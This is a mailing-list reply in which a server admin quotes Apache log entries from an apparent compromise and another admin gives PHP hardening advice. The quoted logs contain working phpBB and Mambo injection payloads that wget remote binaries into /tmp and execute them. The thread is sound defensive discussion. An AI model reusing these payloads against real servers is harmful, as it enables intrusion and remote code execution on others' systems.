David wrote: > Thanks Peter - reassuring to know that someone else thinks they probably > didn't get root... I have been watching ps and netstat -p and haven't > seen anything suspicious, nor seen any more rogue messages in my mail > queue... fingers crossed :) I have plans to replace this box ASAP however. > > I uncovered this in the apache logs: > > ./www.myvirtualhost.domain-access_log:86.35.6.242 - - > [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=% > 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa% > > 3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7 > > 3%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0 (compatible; MSIE > 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" > > looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the > system weathered that one. Closer to date is: > > ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] > [client 85.214.20.161] request failed: erroneous characters aft > er protocol string: GET > /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http: > > //209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| > > HTTP\\x01.1 > > But it looks like that one failed. Oh well time to update php and clean > out a few old phpbb installs. Thanks all for your help. > > David
A few things I always run into with PHP that are popular: 1) Make sure PHPBB is the latest version and not exploitable. I used to allow my clients to install it, but every few months, SOMEONE would install an old exploitable version. I've switched to using debian's PHPBB package, and just point clients to it so I don't have to keep track of it anymore. I just run security updates daily instead on all packages. Haven't been exploited since. 2) Keep register_globals off, and only turn it on as needed. 3) Make sure allow_url_fopen is set to OFF. This is a very popular one, and in my experience tends to attract DDoS attackes rather than a mail exploit. But costs you expensive bandwitdth nonetheless. Regards, Bill
